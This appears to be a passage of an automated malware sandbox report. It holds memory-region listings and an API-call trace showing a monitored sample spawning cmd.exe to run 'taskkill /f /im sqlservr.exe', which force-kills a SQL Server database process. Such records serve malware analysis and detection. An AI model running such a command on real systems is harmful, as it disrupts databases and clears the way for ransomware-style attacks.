1471 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1472 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1473 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1474 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1475 start_va = 0x44c0000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1476 start_va = 0x41d0000 end_va = 0x41f9fff monitored = 0 entry_point = 0x41d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1477 start_va = 0x46e0000 end_va = 0x4867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 1478 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1479 start_va = 0x4870000 end_va = 0x49f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Region: id = 1480 start_va = 0x4a00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 1481 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1482 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 1483 start_va = 0x41d0000 end_va = 0x41d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1484 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 1485 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1486 start_va = 0x5e00000 end_va = 0x6136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1487 start_va = 0x6140000 end_va = 0x6229fff monitored = 0 entry_point = 0x617d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1488 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1489 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 1490 start_va = 0x6140000 end_va = 0x621ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1491 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1492 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 1493 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1494 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 1495 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1496 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1497 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1498 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1499 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 1500 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 1501 start_va = 0x45a0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1502 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 1503 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 1504 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 1505 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1506 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1507 start_va = 0x4570000 end_va = 0x4575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Thread: id = 134 os_tid = 0x6f8 Thread: id = 135 os_tid = 0x86c Thread: id = 136 os_tid = 0x754 Thread: id = 137 os_tid = 0xc44 Thread: id = 138 os_tid = 0x8f4 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x56809000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqlservr.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1510 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1511 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1512 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1513 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1514 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1515 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1516 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1517 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1518 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1519 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1520 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1521 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1522 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1523 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1524 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1525 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1526 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1527 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1528 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1529 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1530 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1531 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1532 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1533 start_va = 0x400000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1534 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1535 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1536 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1537 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1538 start_va = 0x5f0000 end_va = 0x6adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1539 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1540 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1541 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1542 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1543 start_va = 0x7b0000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1544 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1545 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1546 start_va = 0x940000 end_va = 0xc76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 139 os_tid = 0xe44 [0149.656] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0149.656] __set_app_type (_Type=0x1) [0149.656] __p__fmode () returned 0x74974d6c [0149.656] __p__commode () returned 0x74975b1c [0149.656] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0149.656] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0149.657] GetCurrentThreadId () returned 0xe44 [0149.657] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe44) returned 0x78 [0149.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0149.657] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0149.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.673] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.673] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0149.673] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.673] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.673] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.673] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.673] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.673] GetConsoleOutputCP () returned 0x1b5 [0149.678] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0149.678] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0149.679] _get_osfhandle (_FileHandle=1) returned 0x140 [0149.679] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0149.679] _get_osfhandle (_FileHandle=1) returned 0x140 [0149.679] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0149.679] _get_osfhandle (_FileHandle=0) returned 0x13c [0149.679] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0149.679] GetEnvironmentStringsW () returned 0x497cc0* [0149.679] GetProcessHeap () returned 0x490000 [0149.679] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x4986e8 [0149.679] FreeEnvironmentStringsA (penv="A") returned 1 [0149.679] GetProcessHeap () returned 0x490000 [0149.680] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x490550 [0149.680] GetEnvironmentStringsW () returned 0x497cc0* [0149.680] GetProcessHeap () returned 0x490000 [0149.680] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x499110 [0149.680] FreeEnvironmentStringsA (penv="A") returned 1 [0149.680] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0149.680] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.680] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.680] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.680] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.680] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.681] RegCloseKey (hKey=0x88) returned 0x0 [0149.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.681] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.682] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.682] RegCloseKey (hKey=0x88) returned 0x0 [0149.682] time (in: timer=0x0 | out: timer=0x0) returned 0x62344204 [0149.682] srand (_Seed=0x62344204) [0149.682] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlservr.exe \"" [0149.682] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlservr.exe \"" [0149.682] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.682] GetProcessHeap () returned 0x490000 [0149.682] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x499b38 [0149.682] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x499b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0149.682] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0149.682] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0149.683] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.683] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.683] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.683] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.683] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.683] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.684] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.684] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.684] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.684] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.684] GetProcessHeap () returned 0x490000 [0149.684] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4986e8) returned 1 [0149.685] GetEnvironmentStringsW () returned 0x497cc0* [0149.685] GetProcessHeap () returned 0x490000 [0149.685] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa32) returned 0x49a790 [0149.685] FreeEnvironmentStringsA (penv="A") returned 1 [0149.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0149.685] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.685] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.686] GetProcessHeap () returned 0x490000 [0149.686] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x44) returned 0x4905c8 [0149.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0149.686] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0149.686] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0149.686] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x490618 [0149.687] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0149.687] 